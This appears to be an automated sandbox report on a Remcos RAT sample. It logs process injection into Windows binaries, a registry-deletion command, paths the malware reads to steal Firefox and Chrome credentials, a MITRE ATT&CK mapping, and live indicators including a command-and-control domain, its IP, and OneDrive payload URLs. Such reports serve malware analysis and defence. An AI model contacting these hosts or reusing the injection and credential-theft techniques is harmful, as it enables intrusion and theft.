Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2DF0000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3080000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3090000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30A0000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30B0000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3000000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3010000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3020000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3030000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3040000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3050000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 600000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 690000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6A0000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6B0000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6C0000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 610000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 620000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 630000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 640000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 650000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 660000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 650000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6E0000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6F0000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 700000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 710000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 660000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 670000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 680000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 690000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6A0000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6B0000
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000 value starts with: 4D5A
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000 value starts with: 4D5A
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Memory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: 12_2_0041412B CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,12_2_0041412B
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 2DF0000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 30B0000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3030000
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3050000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 600000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 6C0000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 640000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 660000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 650000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 710000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 690000
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 6B0000
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe 28_2_006DFAC7
Source: C:\Users\user\Desktop\yVhvGnsUpL.exe - Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe - Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006E4F84 StrToIntA,mouse_event,28_2_006E4F84
Source: DpiScaling.exe, 0000000C.00000000.302254923.0000000003800000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.392437271.0000000003180000.00000002.00020000.sdmp, mobsync.exe, 00000020.00000000.429496517.0000000003180000.00000002.00020000.sdmp - Binary or memory string: uProgram Manager
Source: DpiScaling.exe, 0000000C.00000000.302254923.0000000003800000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.392437271.0000000003180000.00000002.00020000.sdmp, mobsync.exe, 00000020.00000000.429496517.0000000003180000.00000002.00020000.sdmp - Binary or memory string: Shell_TrayWnd
Source: DpiScaling.exe, 0000000C.00000000.302254923.0000000003800000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.392437271.0000000003180000.00000002.00020000.sdmp, mobsync.exe, 00000020.00000000.429496517.0000000003180000.00000002.00020000.sdmp - Binary or memory string: Progman
Source: DpiScaling.exe, 0000000C.00000000.302254923.0000000003800000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.392437271.0000000003180000.00000002.00020000.sdmp, mobsync.exe, 00000020.00000000.429496517.0000000003180000.00000002.00020000.sdmp - Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\cmd.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: EnumSystemLocalesW,12_2_0044A1D0
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: GetLocaleInfoA,12_2_0040D1E5
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: EnumSystemLocalesW,12_2_0044A21B
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: EnumSystemLocalesW,12_2_0044A2B6
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_0044A343
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: GetLocaleInfoW,12_2_004423BA
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: GetLocaleInfoA,28_2_006DD1E5
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: EnumSystemLocalesW,28_2_0071A1D0
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: EnumSystemLocalesW,28_2_0071A21B
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: EnumSystemLocalesW,28_2_0071A2B6
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,28_2_0071A343
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: GetLocaleInfoW,28_2_007123BA
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: GetLocaleInfoW,28_2_0071A593
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_0071A6BC
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: GetLocaleInfoW,28_2_0071A7C3
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,28_2_0071A890
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: EnumSystemLocalesW,28_2_00711ED1
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,28_2_00719F58
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_006FF9B4 cpuid 28_2_006FF9B4
Source: C:\Windows\SysWOW64\DpiScaling.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: 12_2_00442424 GetSystemTimeAsFileTime,12_2_00442424
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: 28_2_00712C8E _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,28_2_00712C8E
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: 12_2_00416D9E GetComputerNameExW,GetUserNameW,12_2_00416D9E

Stealing of Sensitive Information:

Yara detected Remcos RAT
Source: Yara match - File source: 32.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match - File source: 32.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.10591a73.1.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 32.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match - File source: 32.2.mobsync.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 32.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 32.2.mobsync.exe.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 0000000C.00000002.523698969.0000000003367000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match - File source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 00000020.00000002.435807202.00000000008C8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match - File source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 0000001C.00000002.409833618.0000000000818000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match - File source: Process Memory Space: DpiScaling.exe PID: 6728, type: MEMORYSTR
Source: Yara match - File source: Process Memory Space: mobsync.exe PID: 4868, type: MEMORYSTR
Source: Yara match - File source: Process Memory Space: mobsync.exe PID: 6120, type: MEMORYSTR
Contains functionality to steal Firefox passwords or cookies
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 12_2_0040A012
Source: C:\Windows\SysWOW64\DpiScaling.exe - Code function: \key3.db 12_2_0040A012
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 28_2_006DA012
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: \key3.db 28_2_006DA012
Contains functionality to steal Chrome passwords or cookies
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 28_2_006D9EF4

Remote Access Functionality:

Yara detected Remcos RAT
Source: Yara match - File source: 32.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match - File source: 32.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.10591a73.1.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 32.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 28.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match - File source: 32.2.mobsync.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 32.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 12.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 32.2.mobsync.exe.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match - File source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 0000000C.00000002.523698969.0000000003367000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match - File source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 00000020.00000002.435807202.00000000008C8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match - File source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match - File source: 0000001C.00000002.409833618.0000000000818000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match - File source: Process Memory Space: DpiScaling.exe PID: 6728, type: MEMORYSTR
Source: Yara match - File source: Process Memory Space: mobsync.exe PID: 4868, type: MEMORYSTR
Source: Yara match - File source: Process Memory Space: mobsync.exe PID: 6120, type: MEMORYSTR
Detected Remcos RAT
Source: DpiScaling.exe - String found in binary or memory: Remcos_Mutex_Inj
Source: DpiScaling.exe, 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp - String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
Source: mobsync.exe - String found in binary or memory: Remcos_Mutex_Inj
Source: mobsync.exe, 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp - String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
Source: mobsync.exe, 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp - String found in binary or memory: Remcos_Mutex_Inj
Source: mobsync.exe, 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp - String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
Source: C:\Windows\SysWOW64\mobsync.exe - Code function: cmd.exe 28_2_006D55EA

              Mitre Att&ck Matrix

              Numbers following a technique name are the per-technique counts shown in the report; "-" marks an empty cell.

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Scripting 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
              Default Accounts | Native API 1 | Windows Service 1 | Access Token Manipulation 1 | Scripting 1 | Input Capture 11 | Account Discovery 1 | Remote Desktop Protocol | Input Capture 11 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Defacement 1
              Domain Accounts | Command and Scripting Interpreter 1 | Registry Run Keys / Startup Folder 1 | Windows Service 1 | Obfuscated Files or Information 2 | Credentials In Files 2 | System Service Discovery 1 | SMB/Windows Admin Shares | Clipboard Data 2 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | Service Execution 2 | Logon Script (Mac) | Process Injection 422 | Software Packing 1 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | - | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Registry Run Keys / Startup Folder 1 | Masquerading 1 | LSA Secrets | System Information Discovery 33 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 1 | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Modify Registry 1 | Cached Domain Credentials | Security Software Discovery 12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 11 | Jamming or Denial of Service | - | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 1 | DCSync | Virtualization/Sandbox Evasion 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Process Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 422 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction
              Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | - | - | Data Encrypted for Impact

              Behavior Graph

              Behavior Graph ID: 487629, Sample: yVhvGnsUpL, Start date: 21/09/2021, Architecture: WINDOWS, Score: 100
              Start node: contacts twistednerd.dvrlists.com; signatures: Found malware configuration, Malicious sample detected (through community Yara rule), Multi AV Scanner detection for submitted file, 3 other signatures
                yVhvGnsUpL.exe: contacts sn-files.fe.1drv.com, qcisaa.sn.files.1drv.com, onedrive.live.com; drops C:\Users\Public\Libraries\...\Srakjle.exe (PE32); signature: Injects a PE file into a foreign processes
                  DpiScaling.exe: contacts twistednerd.dvrlists.com (31.3.152.100, ports 49745, 49746, 49747, ALTUSNL, Sweden) and 192.168.2.1; signatures: Contains functionality to inject code into remote processes, Delayed program exit found
                  cmd.exe: starts reg.exe (which starts conhost.exe) and conhost.exe
                  cmd.exe: starts cmd.exe (which starts conhost.exe) and conhost.exe
                Srakjle.exe (two instances): each contacts sn-files.fe.1drv.com and 2 other IPs or domains; signatures: Multi AV Scanner detection for dropped file, Writes to foreign memory regions, Creates a thread in another existing process (thread injection)
                  mobsync.exe (one started by each Srakjle.exe instance); signatures on the first instance: Contains functionality to change the wallpaper, Contains functionality to steal Chrome passwords or cookies, Contains functionality to steal Firefox passwords or cookies


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              yVhvGnsUpL.exe | 18% | Virustotal | -
              yVhvGnsUpL.exe | 13% | ReversingLabs | Win32.Backdoor.Androm

              Dropped Files

              Source | Detection | Scanner | Label
              C:\Users\Public\Libraries\Srakjle\Srakjle.exe | 13% | ReversingLabs | Win32.Backdoor.Androm

              Unpacked PE Files

              Source | Detection | Scanner | Label
              32.0.mobsync.exe.10590000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              12.0.DpiScaling.exe.10590000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              12.0.DpiScaling.exe.10590000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              28.0.mobsync.exe.10590000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              28.0.mobsync.exe.10590000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              28.0.mobsync.exe.10590000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              12.0.DpiScaling.exe.10590000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              32.0.mobsync.exe.10590000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              28.0.mobsync.exe.10590000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              12.2.DpiScaling.exe.10590000.2.unpack | 100% | Avira | TR/Dropper.Gen
              28.2.mobsync.exe.6d0000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
              32.2.mobsync.exe.10590000.1.unpack | 100% | Avira | TR/Dropper.Gen
              32.0.mobsync.exe.10590000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              12.2.DpiScaling.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
              32.2.mobsync.exe.720000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
              28.2.mobsync.exe.10590000.1.unpack | 100% | Avira | TR/Dropper.Gen
              32.0.mobsync.exe.10590000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              12.0.DpiScaling.exe.10590000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

              Domains

              No Antivirus matches

              URLs

              Source | Detection | Scanner | Label
              twistednerd.dvrlists.com | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    twistednerd.dvrlists.com | 31.3.152.100 | true | false | - | high
                    onedrive.live.com | unknown | unknown | false | - | high
                    qcisaa.sn.files.1drv.com | unknown | unknown | false | - | high

                    Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    twistednerd.dvrlists.com | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://qcisaa.sn.files.1drv.com/y4mNt-qRdwgdgleDGIKLTjkSpjyK1SPD4JqhzBPVsXePk0c3S_cv0HIXRKPw3hfw-mi | yVhvGnsUpL.exe, 00000001.00000003.258050716.00000000006BA000.00000004.00000001.sdmp | false | - | high
                    https://qcisaa.sn.files.1drv.com/y4mohjgwISBEqynaGbNFXQ3e1iQ9fbj0U-Xdj6_ZQCNnX6wH2IF_C6xvDKVjks_iaCm | Srakjle.exe, 00000018.00000003.347807282.00000000008E2000.00000004.00000001.sdmp | false | - | high
